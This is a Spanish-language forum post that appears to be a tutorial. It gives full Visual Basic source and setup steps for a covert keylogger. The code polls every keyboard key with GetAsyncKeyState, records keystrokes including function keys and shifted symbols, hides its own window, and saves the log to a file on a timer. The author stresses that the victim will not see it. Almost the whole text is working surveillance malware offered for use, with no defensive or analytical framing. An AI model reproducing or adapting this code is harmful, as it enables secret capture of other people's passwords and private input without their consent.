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Bueno simplemente comienzo: 1 form y 1 modulo en el form ponemos 3 timers y un Text en propiedades del text en scrollbars seleccionamos "3

- Both", en Multiline dam os "True" luego hacemos doble click dentro del Form y borramos todo y luego pegamos el sig uiente codigo dijo:Option Explicit 'En vb2, vb3 y vb4 de 16 bits 'Private Declare Function GetAsyncKeyState Lib "user" (ByVal vKey As Integer) As Integer Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As I nteger Dim i Dim LastData As String Dim Shift As Integer Dim Caps As Integer Dim KeyResult As Long Private Sub AddKey(Key As String) Text1 = Text1 & Key Text1.SelStart = Len(Text1) End Sub Private Sub Form_Load() Timer1.Enabled = True Timer1.Interval = 1 Timer2.Enabled = True Timer2.Interval = 100 Timer3.Enabled = True Timer3.Interval = 1 Form1.Visible = False 'En el Form_Load del text-box: Dim LTmp As Long LTmp = SendMessage(Text1.hwnd, EM_LIMITTEXT, 0, ByVal 0& ) End Sub Private Sub Form_Unload(Cancel As Integer) Form3.Show Me.Hide End Sub Private Sub Timer1_Timer() KeyResult = GetAsyncKeyState(20) If KeyResult = -32767 Then If Caps Then Caps = False Else Caps = True End If GoTo KeyFound End If KeyResult = GetAsyncKeyState(13)

If KeyResult = -32767 Then AddKey "[ENTER]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(8) If KeyResult = -32767 Then AddKey "[BKSPACE]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(9) If KeyResult = -32767 Then AddKey "[TAB]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(27) If KeyResult = -32767 Then AddKey "[Esc]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(32) If KeyResult = -32767 Then AddKey "[Espacio]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(37) If KeyResult = -32767 Then AddKey "[LEFT]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(38) If KeyResult = -32767 Then AddKey "[UP]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(39) If KeyResult = -32767 Then AddKey "[RIGHT]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(40) If KeyResult = -32767 Then AddKey "[DOWN]" GoTo KeyFound End If For i = 65 To 90 KeyResult = GetAsyncKeyState(i) If KeyResult = -32767 Then If Shift Then If Caps Then AddKey Chr(i + 32) Else AddKey Chr(i) Else If Caps Then AddKey Chr(i) Else AddKey Chr(i + 32) End If GoTo KeyFound End If Next i For i = 48 To 57 KeyResult = GetAsyncKeyState(i) If KeyResult = -32767 Then If Shift Then

If i = 49 Then AddKey Chr(33) If i = 50 Then AddKey Chr(64) If i = 51 Then AddKey Chr(35) If i = 52 Then AddKey Chr(36) If i = 53 Then AddKey Chr(37) If i = 54 Then AddKey Chr(94) If i = 55 Then AddKey Chr(38) If i = 56 Then AddKey Chr(42) If i = 57 Then AddKey Chr(40) If i = 48 Then AddKey Chr(41) Else AddKey Chr(i) End If GoTo KeyFound End If Next i KeyResult = GetAsyncKeyState(16) If KeyResult = -32767 And Not Shift Then Shift = True GoTo KeyFound End If KeyResult = GetAsyncKeyState(32) If KeyResult = -32767 Then AddKey " " GoTo KeyFound End If KeyResult = GetAsyncKeyState(189) If KeyResult = -32767 Then If Shift Then AddKey "_" Else AddKey "-" GoTo KeyFound End If KeyResult = GetAsyncKeyState(187) If KeyResult = -32767 Then If Shift Then AddKey "+" Else AddKey "=" GoTo KeyFound End If KeyResult = GetAsyncKeyState(112) If KeyResult = -32767 Then AddKey "[F1]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(113) If KeyResult = -32767 Then AddKey "[F2]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(114) If KeyResult = -32767 Then AddKey "[F3]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(115) If KeyResult = -32767 Then AddKey "[F4]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(116) If KeyResult = -32767 Then AddKey "[F5]" GoTo KeyFound

End If KeyResult = GetAsyncKeyState(117) If KeyResult = -32767 Then AddKey "[F6]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(118) If KeyResult = -32767 Then AddKey "[F7]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(119) If KeyResult = -32767 Then AddKey "[F8]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(120) If KeyResult = -32767 Then AddKey "[F9]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(121) If KeyResult = -32767 Then AddKey "[F10]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(122) If KeyResult = -32767 Then AddKey "[F11]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(123) If KeyResult = -32767 Then AddKey "[F12]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(124) If KeyResult = -32767 Then AddKey "[F13]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(125) If KeyResult = -32767 Then AddKey "[F14]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(126) If KeyResult = -32767 Then AddKey "[F15]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(127) If KeyResult = -32767 Then AddKey "[F16]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(186) If KeyResult = -32767 Then If Shift Then AddKey ":" Else AddKey ";" GoTo KeyFound

End If KeyResult = GetAsyncKeyState(188) If KeyResult = -32767 Then If Shift Then AddKey "<" Else AddKey "," GoTo KeyFound End If KeyResult = GetAsyncKeyState(190) If KeyResult = -32767 Then If Shift Then AddKey ">" Else AddKey "." GoTo KeyFound End If KeyResult = GetAsyncKeyState(191) If KeyResult = -32767 Then If Shift Then AddKey "?" Else AddKey "/" GoTo KeyFound End If KeyResult = GetAsyncKeyState(192) If KeyResult = -32767 Then If Shift Then AddKey "~" Else AddKey "`" GoTo KeyFound End If KeyResult = GetAsyncKeyState(222) If KeyResult = -32767 Then If Shift Then AddKey Chr(34) Else AddKey "'" GoTo KeyFound End If KeyResult = GetAsyncKeyState(220) If KeyResult = -32767 Then If Shift Then AddKey " " Else AddKey "" GoTo KeyFound End If KeyResult = GetAsyncKeyState(221) If KeyResult = -32767 Then If Shift Then AddKey "}" Else AddKey "]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(219) If KeyResult = -32767 Then If Shift Then AddKey "{" Else AddKey "[" GoTo KeyFound End If KeyResult = GetAsyncKeyState(96) If KeyResult = -32767 Then AddKey "0" GoTo KeyFound End If KeyResult = GetAsyncKeyState(97) If KeyResult = -32767 Then AddKey "1" GoTo KeyFound End If KeyResult = GetAsyncKeyState(98) If KeyResult = -32767 Then AddKey "2" GoTo KeyFound End If KeyResult = GetAsyncKeyState(99) If KeyResult = -32767 Then AddKey "3" GoTo KeyFound

End If KeyResult = GetAsyncKeyState(100) If KeyResult = -32767 Then AddKey "4" GoTo KeyFound End If KeyResult = GetAsyncKeyState(101) If KeyResult = -32767 Then AddKey "5" GoTo KeyFound End If KeyResult = GetAsyncKeyState(102) If KeyResult = -32767 Then AddKey "6" GoTo KeyFound End If KeyResult = GetAsyncKeyState(103) If KeyResult = -32767 Then AddKey "7" GoTo KeyFound End If KeyResult = GetAsyncKeyState(104) If KeyResult = -32767 Then AddKey "8" GoTo KeyFound End If KeyResult = GetAsyncKeyState(105) If KeyResult = -32767 Then AddKey "9" GoTo KeyFound End If KeyResult = GetAsyncKeyState(106) If KeyResult = -32767 Then AddKey "*" GoTo KeyFound End If KeyResult = GetAsyncKeyState(107) If KeyResult = -32767 Then AddKey "+" GoTo KeyFound End If KeyResult = GetAsyncKeyState(108) If KeyResult = -32767 Then AddKey "[ENTER]" GoTo KeyFound End If KeyResult = GetAsyncKeyState(109) If KeyResult = -32767 Then AddKey "-" GoTo KeyFound End If KeyResult = GetAsyncKeyState(110) If KeyResult = -32767 Then AddKey "." GoTo KeyFound End If KeyResult = GetAsyncKeyState(111) If KeyResult = -32767 Then AddKey "/" GoTo KeyFound

End If KeyFound: End Sub Private Sub Timer2_Timer() On Error Resume Next Dim graba As String graba = "DIRECCION" 'direccion en donde se va a guardar automaticamente el conte nido detectado mas el nombre del archivo con extension "TXT" pero nunca le quite n las comillas... ej.: "D:Resultado.txt" Open graba For Output As #1 Print #1, Date & vbCrLf & "--------------------------------" & vbCrLf; Text1.Tex t Close #1 End Sub [/quote] y en el Modulo dijoublic Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Public Const WM_USER = &H400 Public Const EM_LIMITTEXT = WM_USER + 21 [/quote] Ahora a provar y el keylogger no lo van a ver ya que va a estar oculto

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